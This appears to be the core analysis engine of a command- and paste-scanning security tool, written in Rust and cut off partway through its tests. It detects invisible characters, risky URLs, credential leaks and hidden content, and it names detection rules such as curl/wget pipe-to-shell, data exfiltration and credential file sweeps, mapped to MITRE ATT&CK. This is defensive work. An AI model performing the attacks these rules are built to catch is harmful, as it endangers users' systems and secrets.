tirith_core/
engine.rs

1use std::time::Instant;
2
3use crate::extract::{self, ScanContext};
4use crate::normalize;
5use crate::policy::Policy;
6use crate::tokenize::ShellType;
7use crate::verdict::{Finding, Timings, Verdict};
8
9/// Extract the raw path from a URL string before any normalization.
10fn extract_raw_path_from_url(raw: &str) -> Option<String> {
11    if let Some(idx) = raw.find("://") {
12        let after = &raw[idx + 3..];
13        if let Some(slash_idx) = after.find('/') {
14            // Find end of path (before ? or #)
15            let path_start = &after[slash_idx..];
16            let end = path_start.find(['?', '#']).unwrap_or(path_start.len());
17            return Some(path_start[..end].to_string());
18        }
19    }
20    None
21}
22
23/// Analysis context passed through the pipeline.
24pub struct AnalysisContext {
25    pub input: String,
26    pub shell: ShellType,
27    pub scan_context: ScanContext,
28    pub raw_bytes: Option<Vec<u8>>,
29    pub interactive: bool,
30    pub cwd: Option<String>,
31    /// File path being scanned (only populated for ScanContext::FileScan).
32    pub file_path: Option<std::path::PathBuf>,
33    /// Only populated for ScanContext::FileScan. When None, configfile checks use
34    /// `file_path`'s parent as implicit repo root.
35    pub repo_root: Option<String>,
36    /// True when `file_path` was explicitly provided by the user as a config file.
37    pub is_config_override: bool,
38    /// Clipboard HTML content for rich-text paste analysis.
39    /// Only populated when `tirith paste --html <path>` is used.
40    pub clipboard_html: Option<String>,
41}
42
43/// Check if a VAR=VALUE word is `TIRITH=0`, stripping optional surrounding quotes
44/// from the value (handles `TIRITH='0'` and `TIRITH="0"`).
45fn is_tirith_zero_assignment(word: &str) -> bool {
46    if let Some((name, raw_val)) = word.split_once('=') {
47        let val = raw_val.trim_matches(|c: char| c == '\'' || c == '"');
48        if name == "TIRITH" && val == "0" {
49            return true;
50        }
51    }
52    false
53}
54
55/// Check if the input contains an inline `TIRITH=0` bypass prefix.
56/// Handles POSIX bare prefix (`TIRITH=0 cmd`), env wrappers (`env -i TIRITH=0 cmd`),
57/// and PowerShell env syntax (`$env:TIRITH="0"; cmd`).
58fn find_inline_bypass(input: &str, shell: ShellType) -> bool {
59    use crate::tokenize;
60
61    if matches!(shell, ShellType::Posix | ShellType::Fish) {
62        let segments = tokenize::tokenize(input, shell);
63        if segments.len() != 1 || has_unquoted_ampersand(input, shell) {
64            return false;
65        }
66    }
67
68    let words = split_raw_words(input, shell);
69    if words.is_empty() {
70        return false;
71    }
72
73    // POSIX / Fish: VAR=VALUE prefix or env wrapper
74    // (Fish 3.1+ and all POSIX shells support `TIRITH=0 command`)
75
76    // Case 1: Leading VAR=VALUE assignments before the command
77    let mut idx = 0;
78    while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
79        if is_tirith_zero_assignment(&words[idx]) {
80            return true;
81        }
82        idx += 1;
83    }
84
85    // Case 2: First real word is `env` — parse env-style args
86    if idx < words.len() {
87        let cmd = words[idx].rsplit('/').next().unwrap_or(&words[idx]);
88        let cmd = cmd.trim_matches(|c: char| c == '\'' || c == '"');
89        if cmd == "env" {
90            idx += 1;
91            while idx < words.len() {
92                let w = &words[idx];
93                if w == "--" {
94                    idx += 1;
95                    // After --, remaining are VAR=VALUE or command
96                    break;
97                }
98                if tokenize::is_env_assignment(w) {
99                    if is_tirith_zero_assignment(w) {
100                        return true;
101                    }
102                    idx += 1;
103                    continue;
104                }
105                if w.starts_with('-') {
106                    if w.starts_with("--") {
107                        if env_long_flag_takes_value(w) && !w.contains('=') {
108                            idx += 2;
109                        } else {
110                            idx += 1;
111                        }
112                        continue;
113                    }
114                    // Short flags that take a separate value arg
115                    if w == "-u" || w == "-C" || w == "-S" {
116                        idx += 2;
117                        continue;
118                    }
119                    idx += 1;
120                    continue;
121                }
122                // Non-flag, non-assignment = the command, stop
123                break;
124            }
125            // Check remaining words after -- for TIRITH=0
126            while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
127                if is_tirith_zero_assignment(&words[idx]) {
128                    return true;
129                }
130                idx += 1;
131            }
132        }
133    }
134
135    // PowerShell: $env:TIRITH="0" or $env:TIRITH = "0" (before first ;)
136    if shell == ShellType::PowerShell {
137        for word in &words {
138            if is_powershell_tirith_bypass(word) {
139                return true;
140            }
141        }
142        // Multi-word: $env:TIRITH = "0" (space around =)
143        if words.len() >= 3 {
144            for window in words.windows(3) {
145                if is_powershell_env_ref(&window[0], "TIRITH")
146                    && window[1] == "="
147                    && strip_surrounding_quotes(&window[2]) == "0"
148                {
149                    return true;
150                }
151            }
152        }
153    }
154
155    // Cmd: "set TIRITH=0 & ..." or 'set "TIRITH=0" & ...'
156    // In cmd.exe, `set TIRITH="0"` stores the literal `"0"` (with quotes) as the
157    // value, so we must NOT strip inner quotes from the value. Only bare `TIRITH=0`
158    // and whole-token-quoted `"TIRITH=0"` are real bypasses.
159    if shell == ShellType::Cmd && words.len() >= 2 {
160        let first = words[0].to_lowercase();
161        if first == "set" {
162            let second = strip_double_quotes_only(&words[1]);
163            if let Some((name, val)) = second.split_once('=') {
164                if name == "TIRITH" && val == "0" {
165                    return true;
166                }
167            }
168        }
169    }
170
171    false
172}
173
174fn env_long_flag_takes_value(flag: &str) -> bool {
175    let name = flag.split_once('=').map(|(name, _)| name).unwrap_or(flag);
176    matches!(name, "--unset" | "--chdir" | "--split-string")
177}
178
179/// Check if a word is `$env:TIRITH=0` with optional quotes around the value.
180/// The `$env:` prefix is matched case-insensitively (PowerShell convention).
181fn is_powershell_tirith_bypass(word: &str) -> bool {
182    if !word.starts_with('$') || word.len() < "$env:TIRITH=0".len() {
183        return false;
184    }
185    let after_dollar = &word[1..];
186    if !after_dollar
187        .get(..4)
188        .is_some_and(|s| s.eq_ignore_ascii_case("env:"))
189    {
190        return false;
191    }
192    let after_env = &after_dollar[4..];
193    if !after_env
194        .get(..7)
195        .is_some_and(|s| s.eq_ignore_ascii_case("TIRITH="))
196    {
197        return false;
198    }
199    let value = &after_env[7..];
200    strip_surrounding_quotes(value) == "0"
201}
202
203/// Check if a word is a PowerShell env var reference `$env:VARNAME` (no assignment).
204fn is_powershell_env_ref(word: &str, var_name: &str) -> bool {
205    if !word.starts_with('$') {
206        return false;
207    }
208    let after_dollar = &word[1..];
209    if !after_dollar
210        .get(..4)
211        .is_some_and(|s| s.eq_ignore_ascii_case("env:"))
212    {
213        return false;
214    }
215    after_dollar[4..].eq_ignore_ascii_case(var_name)
216}
217
218/// Strip a single layer of matching quotes (single or double) from a string.
219fn strip_surrounding_quotes(s: &str) -> &str {
220    if s.len() >= 2
221        && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
222    {
223        &s[1..s.len() - 1]
224    } else {
225        s
226    }
227}
228
229/// Strip a single layer of matching double quotes only. For Cmd, single quotes are literal.
230fn strip_double_quotes_only(s: &str) -> &str {
231    if s.len() >= 2 && s.starts_with('"') && s.ends_with('"') {
232        &s[1..s.len() - 1]
233    } else {
234        s
235    }
236}
237
238/// Split input into raw words respecting quotes (for bypass/self-invocation parsing).
239/// Unlike tokenize(), this doesn't split on pipes/semicolons — just whitespace-splits
240/// the raw input to inspect the first segment's words.
241///
242/// Shell-aware: POSIX uses backslash as escape inside double-quotes and bare context;
243/// PowerShell uses backtick (`` ` ``) instead.
244fn split_raw_words(input: &str, shell: ShellType) -> Vec<String> {
245    let escape_char = match shell {
246        ShellType::PowerShell => '`',
247        ShellType::Cmd => '^',
248        _ => '\\',
249    };
250
251    // Take only up to the first unquoted pipe/semicolon/&&/||
252    let mut words = Vec::new();
253    let mut current = String::new();
254    let chars: Vec<char> = input.chars().collect();
255    let len = chars.len();
256    let mut i = 0;
257
258    while i < len {
259        let ch = chars[i];
260        match ch {
261            ' ' | '\t' if !current.is_empty() => {
262                words.push(current.clone());
263                current.clear();
264                i += 1;
265                while i < len && (chars[i] == ' ' || chars[i] == '\t') {
266                    i += 1;
267                }
268            }
269            ' ' | '\t' => {
270                i += 1;
271            }
272            '|' | '\n' | '&' => break, // Stop at segment boundary
273            ';' if shell != ShellType::Cmd => break,
274            '#' if shell == ShellType::PowerShell => break,
275            '\'' if shell != ShellType::Cmd => {
276                current.push(ch);
277                i += 1;
278                while i < len && chars[i] != '\'' {
279                    current.push(chars[i]);
280                    i += 1;
281                }
282                if i < len {
283                    current.push(chars[i]);
284                    i += 1;
285                }
286            }
287            '"' => {
288                current.push(ch);
289                i += 1;
290                while i < len && chars[i] != '"' {
291                    if chars[i] == escape_char && i + 1 < len {
292                        current.push(chars[i]);
293                        current.push(chars[i + 1]);
294                        i += 2;
295                    } else {
296                        current.push(chars[i]);
297                        i += 1;
298                    }
299                }
300                if i < len {
301                    current.push(chars[i]);
302                    i += 1;
303                }
304            }
305            c if c == escape_char && i + 1 < len => {
306                current.push(chars[i]);
307                current.push(chars[i + 1]);
308                i += 2;
309            }
310            _ => {
311                current.push(ch);
312                i += 1;
313            }
314        }
315    }
316    if !current.is_empty() {
317        words.push(current);
318    }
319    words
320}
321
322/// Check if input contains an unquoted `&` (backgrounding operator).
323fn has_unquoted_ampersand(input: &str, shell: ShellType) -> bool {
324    let escape_char = match shell {
325        ShellType::PowerShell => '`',
326        ShellType::Cmd => '^',
327        _ => '\\',
328    };
329    let chars: Vec<char> = input.chars().collect();
330    let len = chars.len();
331    let mut i = 0;
332    while i < len {
333        match chars[i] {
334            '\'' if shell != ShellType::Cmd => {
335                i += 1;
336                while i < len && chars[i] != '\'' {
337                    i += 1;
338                }
339                if i < len {
340                    i += 1;
341                }
342            }
343            '"' => {
344                i += 1;
345                while i < len && chars[i] != '"' {
346                    if chars[i] == escape_char && i + 1 < len {
347                        i += 2;
348                    } else {
349                        i += 1;
350                    }
351                }
352                if i < len {
353                    i += 1;
354                }
355            }
356            c if c == escape_char && i + 1 < len => {
357                i += 2; // skip escaped char
358            }
359            '&' => return true,
360            _ => i += 1,
361        }
362    }
363    false
364}
365
366/// Run the tiered analysis pipeline.
367pub fn analyze(ctx: &AnalysisContext) -> Verdict {
368    let start = Instant::now();
369
370    // Tier 0: Check bypass flag
371    let tier0_start = Instant::now();
372    let bypass_env = std::env::var("TIRITH").ok().as_deref() == Some("0");
373    let bypass_inline = find_inline_bypass(&ctx.input, ctx.shell);
374    let bypass_requested = bypass_env || bypass_inline;
375    let tier0_ms = tier0_start.elapsed().as_secs_f64() * 1000.0;
376
377    // Tier 1: Fast scan (no I/O)
378    let tier1_start = Instant::now();
379
380    // Step 1 (paste only): byte-level scan for control chars
381    let byte_scan_triggered = if ctx.scan_context == ScanContext::Paste {
382        if let Some(ref bytes) = ctx.raw_bytes {
383            let scan = extract::scan_bytes(bytes);
384            scan.has_ansi_escapes
385                || scan.has_control_chars
386                || scan.has_bidi_controls
387                || scan.has_zero_width
388                || scan.has_invalid_utf8
389                || scan.has_unicode_tags
390                || scan.has_variation_selectors
391                || scan.has_invisible_math_operators
392                || scan.has_invisible_whitespace
393        } else {
394            false
395        }
396    } else {
397        false
398    };
399
400    // Step 2: URL-like regex scan
401    let regex_triggered = extract::tier1_scan(&ctx.input, ctx.scan_context);
402
403    // Step 3 (exec only): check for bidi/zero-width/invisible chars even without URLs
404    let exec_bidi_triggered = if ctx.scan_context == ScanContext::Exec {
405        let scan = extract::scan_bytes(ctx.input.as_bytes());
406        scan.has_bidi_controls
407            || scan.has_zero_width
408            || scan.has_unicode_tags
409            || scan.has_variation_selectors
410            || scan.has_invisible_math_operators
411            || scan.has_invisible_whitespace
412    } else {
413        false
414    };
415
416    let tier1_ms = tier1_start.elapsed().as_secs_f64() * 1000.0;
417
418    // If nothing triggered, fast exit
419    if !byte_scan_triggered && !regex_triggered && !exec_bidi_triggered {
420        let total_ms = start.elapsed().as_secs_f64() * 1000.0;
421        return Verdict::allow_fast(
422            1,
423            Timings {
424                tier0_ms,
425                tier1_ms,
426                tier2_ms: None,
427                tier3_ms: None,
428                total_ms,
429            },
430        );
431    }
432
433    // Tier 2: Policy + data loading (deferred I/O)
434    let tier2_start = Instant::now();
435
436    if bypass_requested {
437        // Load partial policy to check bypass settings
438        let policy = Policy::discover_partial(ctx.cwd.as_deref());
439        let allow_bypass = if ctx.interactive {
440            policy.allow_bypass_env
441        } else {
442            policy.allow_bypass_env_noninteractive
443        };
444
445        if allow_bypass {
446            let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
447            let total_ms = start.elapsed().as_secs_f64() * 1000.0;
448            let mut verdict = Verdict::allow_fast(
449                2,
450                Timings {
451                    tier0_ms,
452                    tier1_ms,
453                    tier2_ms: Some(tier2_ms),
454                    tier3_ms: None,
455                    total_ms,
456                },
457            );
458            verdict.bypass_requested = true;
459            verdict.bypass_honored = true;
460            verdict.interactive_detected = ctx.interactive;
461            verdict.policy_path_used = policy.path.clone();
462            // Log bypass to audit (include custom DLP patterns from partial policy)
463            crate::audit::log_verdict(
464                &verdict,
465                &ctx.input,
466                None,
467                None,
468                &policy.dlp_custom_patterns,
469            );
470            return verdict;
471        }
472    }
473
474    let mut policy = Policy::discover(ctx.cwd.as_deref());
475    policy.load_user_lists();
476    policy.load_org_lists(ctx.cwd.as_deref());
477    let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
478
479    // Tier 3: Full analysis
480    let tier3_start = Instant::now();
481    let mut findings = Vec::new();
482
483    // Track extracted URLs for allowlist/blocklist (Exec/Paste only)
484    let mut extracted = Vec::new();
485
486    if ctx.scan_context == ScanContext::FileScan {
487        // FileScan: byte scan + configfile rules ONLY.
488        // Does NOT run command/env/URL-extraction rules.
489        let byte_input = if let Some(ref bytes) = ctx.raw_bytes {
490            bytes.as_slice()
491        } else {
492            ctx.input.as_bytes()
493        };
494        let byte_findings = crate::rules::terminal::check_bytes(byte_input);
495        findings.extend(byte_findings);
496
497        // Config file detection rules
498        findings.extend(crate::rules::configfile::check(
499            &ctx.input,
500            ctx.file_path.as_deref(),
501            ctx.repo_root.as_deref().map(std::path::Path::new),
502            ctx.is_config_override,
503        ));
504
505        // Code file pattern scanning rules
506        if crate::rules::codefile::is_code_file(
507            ctx.file_path.as_deref().and_then(|p| p.to_str()),
508            &ctx.input,
509        ) {
510            findings.extend(crate::rules::codefile::check(
511                &ctx.input,
512                ctx.file_path.as_deref().and_then(|p| p.to_str()),
513            ));
514        }
515
516        // Rendered content rules (file-type gated)
517        if crate::rules::rendered::is_renderable_file(ctx.file_path.as_deref()) {
518            // PDF files get their own parser
519            let is_pdf = ctx
520                .file_path
521                .as_deref()
522                .and_then(|p| p.extension())
523                .and_then(|e| e.to_str())
524                .map(|e| e.eq_ignore_ascii_case("pdf"))
525                .unwrap_or(false);
526
527            if is_pdf {
528                let pdf_bytes = ctx.raw_bytes.as_deref().unwrap_or(ctx.input.as_bytes());
529                findings.extend(crate::rules::rendered::check_pdf(pdf_bytes));
530            } else {
531                findings.extend(crate::rules::rendered::check(
532                    &ctx.input,
533                    ctx.file_path.as_deref(),
534                ));
535            }
536        }
537    } else {
538        // Exec/Paste: standard pipeline
539
540        // Run byte-level rules for paste context
541        if ctx.scan_context == ScanContext::Paste {
542            if let Some(ref bytes) = ctx.raw_bytes {
543                let byte_findings = crate::rules::terminal::check_bytes(bytes);
544                findings.extend(byte_findings);
545            }
546            // Check for hidden multiline content in pasted text
547            let multiline_findings = crate::rules::terminal::check_hidden_multiline(&ctx.input);
548            findings.extend(multiline_findings);
549
550            // Check clipboard HTML for hidden content (rich-text paste analysis)
551            if let Some(ref html) = ctx.clipboard_html {
552                let clipboard_findings =
553                    crate::rules::terminal::check_clipboard_html(html, &ctx.input);
554                findings.extend(clipboard_findings);
555            }
556        }
557
558        // Invisible character checks apply to both exec and paste contexts
559        if ctx.scan_context == ScanContext::Exec {
560            let byte_input = ctx.input.as_bytes();
561            let scan = extract::scan_bytes(byte_input);
562            if scan.has_bidi_controls
563                || scan.has_zero_width
564                || scan.has_unicode_tags
565                || scan.has_variation_selectors
566                || scan.has_invisible_math_operators
567                || scan.has_invisible_whitespace
568            {
569                let byte_findings = crate::rules::terminal::check_bytes(byte_input);
570                // Only keep invisible-char findings for exec context
571                findings.extend(byte_findings.into_iter().filter(|f| {
572                    matches!(
573                        f.rule_id,
574                        crate::verdict::RuleId::BidiControls
575                            | crate::verdict::RuleId::ZeroWidthChars
576                            | crate::verdict::RuleId::UnicodeTags
577                            | crate::verdict::RuleId::InvisibleMathOperator
578                            | crate::verdict::RuleId::VariationSelector
579                            | crate::verdict::RuleId::InvisibleWhitespace
580                    )
581                }));
582            }
583        }
584
585        // Extract and analyze URLs
586        extracted = extract::extract_urls(&ctx.input, ctx.shell);
587
588        for url_info in &extracted {
589            // Normalize path if available — use raw extracted URL's path for non-ASCII detection
590            // since url::Url percent-encodes non-ASCII during parsing
591            let raw_path = extract_raw_path_from_url(&url_info.raw);
592            let normalized_path = url_info.parsed.path().map(normalize::normalize_path);
593
594            // Run all rule categories
595            let hostname_findings = crate::rules::hostname::check(&url_info.parsed, &policy);
596            findings.extend(hostname_findings);
597
598            let path_findings = crate::rules::path::check(
599                &url_info.parsed,
600                normalized_path.as_ref(),
601                raw_path.as_deref(),
602            );
603            findings.extend(path_findings);
604
605            let transport_findings =
606                crate::rules::transport::check(&url_info.parsed, url_info.in_sink_context);
607            findings.extend(transport_findings);
608
609            let ecosystem_findings = crate::rules::ecosystem::check(&url_info.parsed);
610            findings.extend(ecosystem_findings);
611        }
612
613        // Run command-shape rules on full input
614        let command_findings = crate::rules::command::check(
615            &ctx.input,
616            ctx.shell,
617            ctx.cwd.as_deref(),
618            ctx.scan_context,
619        );
620        findings.extend(command_findings);
621
622        // Run credential leak detection rules
623        let cred_findings =
624            crate::rules::credential::check(&ctx.input, ctx.shell, ctx.scan_context);
625        findings.extend(cred_findings);
626
627        // Run environment rules
628        let env_findings = crate::rules::environment::check(&crate::rules::environment::RealEnv);
629        findings.extend(env_findings);
630
631        // Policy-driven network deny/allow
632        if !policy.network_deny.is_empty() {
633            let net_findings = crate::rules::command::check_network_policy(
634                &ctx.input,
635                ctx.shell,
636                &policy.network_deny,
637                &policy.network_allow,
638            );
639            findings.extend(net_findings);
640        }
641    }
642
643    // Custom YAML detection rules
644    if !policy.custom_rules.is_empty() {
645        let compiled = crate::rules::custom::compile_rules(&policy.custom_rules);
646        let custom_findings = crate::rules::custom::check(&ctx.input, ctx.scan_context, &compiled);
647        findings.extend(custom_findings);
648    }
649
650    // Apply policy severity overrides
651    for finding in &mut findings {
652        if let Some(override_sev) = policy.severity_override(&finding.rule_id) {
653            finding.severity = override_sev;
654        }
655    }
656
657    // Filter by allowlist/blocklist
658    // Blocklist: if any extracted URL matches blocklist, escalate to Block
659    for url_info in &extracted {
660        if policy.is_blocklisted(&url_info.raw) {
661            findings.push(Finding {
662                rule_id: crate::verdict::RuleId::PolicyBlocklisted,
663                severity: crate::verdict::Severity::Critical,
664                title: "URL matches blocklist".to_string(),
665                description: format!("URL '{}' matches a blocklist pattern", url_info.raw),
666                evidence: vec![crate::verdict::Evidence::Url {
667                    raw: url_info.raw.clone(),
668                }],
669                human_view: None,
670                agent_view: None,
671                mitre_id: None,
672                custom_rule_id: None,
673            });
674        }
675    }
676
677    // Allowlist: remove findings for URLs that match allowlist
678    // (blocklist takes precedence — if blocklisted, findings remain)
679    if !policy.allowlist.is_empty() || !policy.allowlist_rules.is_empty() {
680        let blocklisted_urls: Vec<&str> = extracted
681            .iter()
682            .filter(|u| policy.is_blocklisted(&u.raw))
683            .map(|u| u.raw.as_str())
684            .collect();
685
686        findings.retain(|f| {
687            let urls_in_evidence: Vec<&str> = f
688                .evidence
689                .iter()
690                .filter_map(|e| match e {
691                    crate::verdict::Evidence::Url { raw } => Some(raw.as_str()),
692                    _ => None,
693                })
694                .collect();
695
696            if urls_in_evidence.is_empty() {
697                return true;
698            }
699
700            let rule_allowlisted = |url: &str| {
701                policy.is_allowlisted_for_rule(&f.rule_id.to_string(), url)
702                    || f.custom_rule_id.as_deref().is_some_and(|custom_rule_id| {
703                        policy.is_allowlisted_for_rule(custom_rule_id, url)
704                    })
705            };
706
707            // Keep if any referenced URL is blocklisted. Otherwise only drop the
708            // finding when every referenced URL is allowlisted for this finding.
709            urls_in_evidence
710                .iter()
711                .any(|url| blocklisted_urls.contains(url))
712                || !urls_in_evidence
713                    .iter()
714                    .all(|url| policy.is_allowlisted(url) || rule_allowlisted(url))
715        });
716    }
717
718    // Enrichment is always enabled in the single-tier runtime.
719    enrich_pro(&mut findings);
720    enrich_team(&mut findings);
721
722    // Early-access suppression is disabled in the single-tier runtime.
723    crate::rule_metadata::filter_early_access(&mut findings, crate::license::Tier::Enterprise);
724
725    let tier3_ms = tier3_start.elapsed().as_secs_f64() * 1000.0;
726    let total_ms = start.elapsed().as_secs_f64() * 1000.0;
727
728    let mut verdict = Verdict::from_findings(
729        findings,
730        3,
731        Timings {
732            tier0_ms,
733            tier1_ms,
734            tier2_ms: Some(tier2_ms),
735            tier3_ms: Some(tier3_ms),
736            total_ms,
737        },
738    );
739    verdict.bypass_requested = bypass_requested;
740    verdict.interactive_detected = ctx.interactive;
741    verdict.policy_path_used = policy.path.clone();
742    verdict.urls_extracted_count = Some(extracted.len());
743
744    verdict
745}
746
747// ---------------------------------------------------------------------------
748// Paranoia tier filtering (Phase 15)
749// ---------------------------------------------------------------------------
750
751/// Filter a verdict's findings by paranoia level.
752///
753/// This is an output-layer filter — the engine always detects everything.
754/// CLI/MCP call this after `analyze()` to reduce noise at lower paranoia levels.
755///
756/// - Paranoia 1-2: Medium+ findings only
757/// - Paranoia 3: also show Low findings
758/// - Paranoia 4: also show Info findings
759pub fn filter_findings_by_paranoia(verdict: &mut Verdict, paranoia: u8) {
760    retain_by_paranoia(&mut verdict.findings, paranoia);
761    verdict.action = recalculate_action(&verdict.findings);
762}
763
764/// Filter a Vec<Finding> by paranoia level.
765/// Same logic as `filter_findings_by_paranoia` but operates on raw findings.
766pub fn filter_findings_by_paranoia_vec(findings: &mut Vec<Finding>, paranoia: u8) {
767    retain_by_paranoia(findings, paranoia);
768}
769
770/// Recalculate verdict action from the current findings (same logic as `Verdict::from_findings`).
771fn recalculate_action(findings: &[Finding]) -> crate::verdict::Action {
772    use crate::verdict::{Action, Severity};
773    if findings.is_empty() {
774        return Action::Allow;
775    }
776    let max_severity = findings
777        .iter()
778        .map(|f| f.severity)
779        .max()
780        .unwrap_or(Severity::Low);
781    match max_severity {
782        Severity::Critical | Severity::High => Action::Block,
783        Severity::Medium | Severity::Low => Action::Warn,
784        Severity::Info => Action::Allow,
785    }
786}
787
788/// Shared paranoia retention logic.
789fn retain_by_paranoia(findings: &mut Vec<Finding>, paranoia: u8) {
790    let effective = paranoia.min(4);
791
792    findings.retain(|f| match f.severity {
793        crate::verdict::Severity::Info => effective >= 4,
794        crate::verdict::Severity::Low => effective >= 3,
795        _ => true, // Medium/High/Critical always shown
796    });
797}
798
799// ---------------------------------------------------------------------------
800// Finding enrichment
801// ---------------------------------------------------------------------------
802
803/// Pro enrichment: dual-view, decoded content, cloaking diffs, line numbers.
804fn enrich_pro(findings: &mut [Finding]) {
805    for finding in findings.iter_mut() {
806        match finding.rule_id {
807            // Rendered content findings: show what human sees vs what agent processes
808            crate::verdict::RuleId::HiddenCssContent => {
809                finding.human_view =
810                    Some("Content hidden via CSS — invisible in rendered view".into());
811                finding.agent_view = Some(format!(
812                    "AI agent sees full text including CSS-hidden content. {}",
813                    evidence_summary(&finding.evidence)
814                ));
815            }
816            crate::verdict::RuleId::HiddenColorContent => {
817                finding.human_view =
818                    Some("Text blends with background — invisible to human eye".into());
819                finding.agent_view = Some(format!(
820                    "AI agent reads text regardless of color contrast. {}",
821                    evidence_summary(&finding.evidence)
822                ));
823            }
824            crate::verdict::RuleId::HiddenHtmlAttribute => {
825                finding.human_view =
826                    Some("Elements marked hidden/aria-hidden — not displayed".into());
827                finding.agent_view = Some(format!(
828                    "AI agent processes hidden element content. {}",
829                    evidence_summary(&finding.evidence)
830                ));
831            }
832            crate::verdict::RuleId::HtmlComment => {
833                finding.human_view = Some("HTML comments not rendered in browser".into());
834                finding.agent_view = Some(format!(
835                    "AI agent reads comment content as context. {}",
836                    evidence_summary(&finding.evidence)
837                ));
838            }
839            crate::verdict::RuleId::MarkdownComment => {
840                finding.human_view = Some("Markdown comments not rendered in preview".into());
841                finding.agent_view = Some(format!(
842                    "AI agent processes markdown comment content. {}",
843                    evidence_summary(&finding.evidence)
844                ));
845            }
846            crate::verdict::RuleId::PdfHiddenText => {
847                finding.human_view = Some("Sub-pixel text invisible in PDF viewer".into());
848                finding.agent_view = Some(format!(
849                    "AI agent extracts all text including sub-pixel content. {}",
850                    evidence_summary(&finding.evidence)
851                ));
852            }
853            crate::verdict::RuleId::ClipboardHidden => {
854                finding.human_view =
855                    Some("Hidden content in clipboard HTML not visible in paste preview".into());
856                finding.agent_view = Some(format!(
857                    "AI agent processes full clipboard including hidden HTML. {}",
858                    evidence_summary(&finding.evidence)
859                ));
860            }
861            _ => {}
862        }
863    }
864}
865
866/// Summarize evidence entries for enrichment text.
867fn evidence_summary(evidence: &[crate::verdict::Evidence]) -> String {
868    let details: Vec<&str> = evidence
869        .iter()
870        .filter_map(|e| {
871            if let crate::verdict::Evidence::Text { detail } = e {
872                Some(detail.as_str())
873            } else {
874                None
875            }
876        })
877        .take(3)
878        .collect();
879    if details.is_empty() {
880        String::new()
881    } else {
882        format!("Details: {}", details.join("; "))
883    }
884}
885
886/// MITRE ATT&CK technique mapping for built-in rules.
887fn mitre_id_for_rule(rule_id: crate::verdict::RuleId) -> Option<&'static str> {
888    use crate::verdict::RuleId;
889    match rule_id {
890        // Execution
891        RuleId::PipeToInterpreter
892        | RuleId::CurlPipeShell
893        | RuleId::WgetPipeShell
894        | RuleId::HttpiePipeShell
895        | RuleId::XhPipeShell => Some("T1059.004"), // Command and Scripting Interpreter: Unix Shell
896
897        // Persistence
898        RuleId::DotfileOverwrite => Some("T1546.004"), // Event Triggered Execution: Unix Shell Config
899
900        // Defense Evasion
901        RuleId::BidiControls
902        | RuleId::UnicodeTags
903        | RuleId::ZeroWidthChars
904        | RuleId::InvisibleMathOperator
905        | RuleId::VariationSelector
906        | RuleId::InvisibleWhitespace => {
907            Some("T1036.005") // Masquerading: Match Legitimate Name or Location
908        }
909        RuleId::HiddenMultiline | RuleId::AnsiEscapes | RuleId::ControlChars => Some("T1036.005"),
910
911        // Hijack Execution Flow
912        RuleId::CodeInjectionEnv => Some("T1574.006"), // Hijack Execution Flow: Dynamic Linker Hijacking
913        RuleId::InterpreterHijackEnv => Some("T1574.007"), // Path Interception by PATH
914        RuleId::ShellInjectionEnv => Some("T1546.004"), // Shell Config Modification
915
916        // Credential Access
917        RuleId::CredentialInText | RuleId::HighEntropySecret => Some("T1552"), // Unsecured Credentials
918        RuleId::PrivateKeyExposed => Some("T1552.004"),                        // Private Keys
919        RuleId::MetadataEndpoint => Some("T1552.005"), // Unsecured Credentials: Cloud Instance Metadata
920        RuleId::SensitiveEnvExport | RuleId::CredentialFileSweep => Some("T1552.001"), // Credentials In Files
921        RuleId::ProcMemAccess => Some("T1003.007"), // OS Credential Dumping: Proc Filesystem
922        RuleId::DockerRemotePrivEsc => Some("T1611"), // Escape to Host
923
924        // Supply Chain
925        RuleId::ConfigInjection => Some("T1195.001"), // Supply Chain Compromise: Dev Tools
926        RuleId::McpInsecureServer | RuleId::McpSuspiciousArgs => Some("T1195.002"), // Compromise Software Supply Chain
927        RuleId::GitTyposquat => Some("T1195.001"),
928        RuleId::DockerUntrustedRegistry => Some("T1195.002"),
929
930        // Discovery / Lateral Movement
931        RuleId::PrivateNetworkAccess => Some("T1046"), // Network Service Discovery
932        RuleId::ServerCloaking => Some("T1036"),       // Masquerading
933
934        // Collection
935        RuleId::ArchiveExtract => Some("T1560.001"), // Archive Collected Data: Archive via Utility
936
937        // Exfiltration
938        RuleId::ProxyEnvSet => Some("T1090.001"), // Proxy: Internal Proxy
939        RuleId::DataExfiltration => Some("T1048.003"), // Exfiltration Over Unencrypted Non-C2 Protocol
940        RuleId::SuspiciousCodeExfiltration => Some("T1041"), // Exfiltration Over C2 Channel
941
942        // Command Obfuscation
943        RuleId::Base64DecodeExecute => Some("T1027.010"), // Command Obfuscation
944        RuleId::ObfuscatedPayload => Some("T1027"),       // Obfuscated Files or Information
945        RuleId::DynamicCodeExecution => Some("T1059"),    // Command and Scripting Interpreter
946
947        _ => None,
948    }
949}
950
951/// Team enrichment: MITRE ATT&CK classification.
952fn enrich_team(findings: &mut [Finding]) {
953    for finding in findings.iter_mut() {
954        if finding.mitre_id.is_none() {
955            finding.mitre_id = mitre_id_for_rule(finding.rule_id).map(String::from);
956        }
957    }
958}
959
960#[cfg(test)]
961mod tests {
962    use super::*;
963    #[test]
964    fn test_exec_bidi_without_url() {
965        // Input with bidi control but no URL — should NOT fast-exit at tier 1
966        let input = format!("echo hello{}world", '\u{202E}');
967        let ctx = AnalysisContext {
968            input,
969            shell: ShellType::Posix,
970            scan_context: ScanContext::Exec,
971            raw_bytes: None,
972            interactive: true,
973            cwd: None,
974            file_path: None,
975            repo_root: None,
976            is_config_override: false,
977            clipboard_html: None,
978        };
979        let verdict = analyze(&ctx);
980        // Should reach tier 3 (not fast-exit at tier 1)
981        assert!(
982            verdict.tier_reached >= 3,
983            "bidi in exec should reach tier 3, got tier {}",
984            verdict.tier_reached
985        );
986        // Should have findings about bidi
987        assert!(
988            verdict
989                .findings
990                .iter()
991                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::BidiControls)),
992            "should detect bidi controls in exec context"
993        );
994    }
995
996    #[test]
997    fn test_paranoia_filter_suppresses_info_low() {
998        use crate::verdict::{Finding, RuleId, Severity, Timings, Verdict};
999
1000        let findings = vec![
1001            Finding {
1002                rule_id: RuleId::VariationSelector,
1003                severity: Severity::Info,
